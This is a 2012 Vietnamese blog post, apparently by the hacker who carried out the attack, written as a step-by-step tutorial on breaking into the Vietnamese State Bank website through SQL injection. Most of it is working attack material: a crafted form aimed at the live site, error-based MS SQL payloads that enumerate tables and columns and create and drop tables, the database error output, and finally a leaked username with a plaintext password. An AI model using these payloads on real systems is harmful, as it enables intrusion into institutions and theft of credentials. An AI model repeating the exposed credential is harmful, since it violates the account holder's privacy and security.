New Post

Tuesday, September 25, 2012

Hacked by langtuhaohoa ( thx my friend WinDak )


hề hề ! Tại nghe đâu phong phanh là " Ngân Hàng Nhà Nước Việt Nam ( www.sbv.gov.vn )" bị dính Sql inject ... thấy chữ ngân hàng cũng tính mò dô xem xem thế nào  lượng đi lượn lại vài dòng thấy chã có url nào khai thác được cả ... ! híc ! Thấy nãn nãn... !

Đang xem thì thấy mấy cái input dạng select .... nhìn nhìn hồi nghĩ thôi thữ đại xem sao  biết đâu được
Chọn đại cái : http://www.sbv.gov.vn/home/hethongTCTDHT.asp

thấy cái select Tỉnh/Thành Phố ... thữ xem sao ! View source thấy 1 form như thế này :

Code:
<form name="Tim" method="post" action="hethongTCTDHT.asp" autocomplete="on"> 

<p align="right">Tỉnh / Thành phố:

<select size="1" name="lstTinh" style="font-family: Times New Roman; background-color:#FFFFFF; font-size:12pt" onchange="document.Tim.submit()">
<option value="ALL">Tất cả các tỉnh thành</option>

<option value="DANANG">Đà Nẵng</option>

<option value="DACLAC">Đắc Lắc</option>

<option value="DACNONG">Đắc Nông</option>

<option value="DONGNAI">Đồng Nai</option>


<option value="DONGTHAP">Đồng Tháp</option>

<option value="ANGIANG">An Giang</option>

<option value="BARIAVUNGTAU">Bà Rịa-Vũng Tàu</option>

<option value="BINHDINH">Bình Định</option>

<option value="BINHDUONG">Bình Dương</option>

<option value="BINHPHUOC">Bình Phước</option>


<option value="BINHTHUAN">Bình Thuận</option>

<option value="BACLIEU">Bạc Liêu</option>

<option value="BACCAN">Bắc Cạn</option>

<option value="BACGIANG">Bắc Giang</option>

<option value="BACNINH">Bắc Ninh</option>

<option value="BENTRE">Bến Tre</option>


<option value="CAMAU">Cà Mau</option>

<option value="CAOBANG">Cao Bằng</option>

<option value="GIALAI">Gia Lai</option>

<option value="HAGIANG">Hà Giang</option>

<option value="HANOI">Hà Nội</option>

<option value="HANAM">Hà Nam</option>


<option value="HATAY">Hà Tây</option>

<option value="HATINH">Hà Tĩnh</option>

<option value="HAIDUONG">Hải Dương</option>

<option value="HAIPHONG">Hải Phòng</option>

<option value="HAUGIANG">Hậu Giang</option>

<option value="HUNGYEN">Hưng Yên</option>


<option value="HOABINH">Hoà Bình</option>

<option value="KHANHHOA">Khánh Hoà</option>

<option value="KIENGIANG">Kiên Giang</option>

<option value="KONTUM">Kon Tum</option>

<option value="LAOCAI">Lào Cai</option>

<option value="LAMDONG">Lâm Đồng</option>


<option value="LANGSON">Lạng Sơn</option>

<option value="LAICHAU">Lai Châu</option>

<option value="LONGAN">Long An</option>

<option value="NAMDINH">Nam Định</option>

<option value="NGHEAN">Nghệ An</option>

<option value="NINHBINH">Ninh Bình</option>


<option value="NINHTHUAN">Ninh Thuận</option>

<option value="PHUTHO">Phú Thọ</option>

<option value="PHUYEN">Phú Yên</option>

<option value="QUANGBINH">Quảng Bình</option>

<option value="QUANGNAM">Quảng Nam</option>

<option value="QUANGNGAI">Quảng Ngãi</option>


<option value="QUANGNINH">Quảng Ninh</option>

<option value="QUANGTRI">Quảng Trị</option>

<option value="SOCTRANG">Sóc Trăng</option>

<option value="SONLA">Sơn La</option>

<option value="TAYNINH">Tây Ninh</option>

<option value="THAIBINH">Thái Bình</option>


<option value="THAINGUYEN">Thái Nguyên</option>

<option value="THUATHIENHUE">Thừa Thiên Huế</option>

<option value="THANHHOA">Thanh Hoá</option>

<option value="TIENGIANG">Tiền Giang</option>

<option value="TPHCM">TP Hồ Chí Minh</option>

<option value="TPHUE">TP Huế</option>


<option value="TRAVINH">Trà Vinh</option>

<option selected value="TW">Trung Ương</option>

<option value="TUYENQUANG">Tuyên Quang</option>

<option value="VINHLONG">Vĩnh Long</option>

<option value="VINHPHUC">Vĩnh Phúc</option>

<option value="YENBAI">Yên Bái</option>

</select></p>
</form>
oài ! thấy có cả daklak trong đó  ( quê nhà mà hê hê ) thôi thì thữ coppy về và edit 1 xí xem sao :

Code:
<form name="Tim" method="post" action="http://www.sbv.gov.vn/home/hethongTCTDHT.asp" autocomplete="on"> 

<input type="text" size="100" name="lstTinh">
<input name="submit" type="submit" value="submit">
</form>
langtu save lại thành file test.html và mở ra type dô cái input vài dòng thữ xem sao :
Code:
' or 1=(@@version)--
và submit ... óe nó hiện ra cái gì đây :eek: :
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int.

/home/hethongTCTDHT.asp, line 172
hề hề ! Sql inject cực nặng rồi nhé ... ! back lại test.html lt type vào :

Trích:
'; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+table_name+'/' from information_schema.tables select @temp as id into langtu end--
Đoạn query trên có nghĩa là gì ?? declare @temp varchar(8000) là khai báo cho @temp rỗng và varchar(8000) ( cái này giống như kiểu khai báo biến trong các ngôn ngữ lập trình khác í mà ) tiếp theo là : set @temp='' select @temp=@temp+table_name+'/' from information_schema.tables cái này là đặt điều kiện cho @temp seclect ra table và tiếp tục cộng thêm 1 table tiếp theo ngăn cách bằng " / " ! select @temp as id into langtu end-- chọn @temp ờ cột id và trong table langtu ! Chắc phần nào hiểu rồi chứ  hí hí !

Ok ! sau khi submit query trên ta sẽ được trả về http://www.sbv.gov.vn/home/hethongTCTDHT.asp và ko bị báo lỗi gì cả thì ta đã thành công !

Tiếp theo langtu sẽ select ra tất cả các table trong user data "dthai" mà sbv đang sữ dụng :
Code:
' or 1=(select id from langtu)--

Tự nhiên đang viết tut có hứng tới đây nó ra mẹ user + pass  khó hiểu quá ! Quyết tìm hiểu xem vì sao lại thế chứ...


Trích:
' or 1=(select id from langtu)--
ặc ặc ! Bây giờ thì mới đúng nè ... híc !
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDNT/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/cdeCSTT_LS/cdeCSTT_tbao_TPCP/cdeCSTT_tbao_TPKB/cdeKTTT/cdeQLNH_dienbienTG/CdeTCCB/cdeTTKS/DetaiNCKH/dtproperties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoibat/sysconstraints/syssegments/thongcaobaochi/TinhThanh/Tintuc/tuyentruyen/Tygiabinhquan/Tygi...

/home/hethongTCTDHT.asp, line 172
Tuy đã biết user + pass nhưng mình vẫn sẽ viết tiếp cho đúng cách làm việc của nó !
Bây giờ bạn hãy thữ nhìn lên cái error list ra các table coi ??? nó hiện ra ko đầy đủ đúng ko ?? cái :" Tygiabinhquan/Tygi... " có nghĩa là table nó dài quá ko list hết ra được !
hùhm,... giờ sao cho nó list hết ra nhĩ ??? OK langtu dùng substring

Trích:
' or 1=(select top 1 substring(id,1,100) from langtu)--
được :
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDNT/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/cd' to a column of data type int.

/home/hethongTCTDHT.asp, line 172
nó sẽ list ra 100 kí tự đầu tiên từ 1---> 100 :cool: Nhưng ta vấn chưa thấy table chứa user đâu cả  tiếp tục :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
Trích:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'eCSTT_LS/cdeCSTT_tbao_TPCP/cdeCSTT_tbao_TPKB/cdeKTTT/cdeQLNH_dienbienTG/CdeTCCB/cdeTTKS/DetaiNCKH/dtproperties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoibat/sysconstraints/syssegments/thongcaob' to a column of data type int.

/home/hethongTCTDHT.asp, line 172
óe ! vấn chưa thấy tiếp tục :
Trích:
' or 1=(select top 1 substring(id,201,300) from langtu)--
Được :
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'properties/hoidap/nghiencuutraodoi/Ngoaite/QuyTDND/sukiennoibat/sysconstraints/syssegments/thongcaobaochi/TinhThanh/Tintuc/tuyentruyen/Tygiabinhquan/Tygiacheo/TygiaVCB/Vanban/webgrand/webgroup/webuser/CacTCTD/cdeCNTH/cdeCSTT_BCthuongnien/cdeCSTT_DTBB/cdeCSTT_HDNT/cdeCSTT_kqua_TPCP/cdeCSTT_kqua_TTM/c' to a column of data type int.

/home/hethongTCTDHT.asp, line 172
hè hè ! ta thấy table webuser rồi !

Bây giờ thì ta drop table langtu đi thôi : '; drop table langtu--

OK thành công ! Để lấy tất cả column trong table webuser ta lại tiếp tục insert 1 column @temp vào table webuser giống hồi nãy dậy ta ! type :

Trích:
'; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+column_name+'/' from information_schema.columns where table_name='webuser' select @temp as id into langtu end--
ko báo lỗi , tiếp tục : ' or 1=(select 1 from langtu)--

được :
Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'uid/username/password/description/gid/grand/QL/uid/username/password/description/gid/grand/QL/' to a column of data type int.

/home/hethongTCTDHT.asp, line 172
drop table langtu đi và tiếp tục :
Trích:
'; begin declare @temp varchar(8000) set @temp='' select @temp=@temp+username+':'+password+'/' from webuser select @temp as id into langtu end--
ko báo lỗi , giờ ta tiếp tục lấy user + pass : ' or 1=(select id from langtu)--

được :

Trích:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'levietcuong :lvc123 /' to a column of data type int.

/home/hethongTCTDHT.asp, line 172
Bye bye good luck to hack !
Author : langtuhaohoa ( HCEGroup.net )

0 nhận xét:

Post a Comment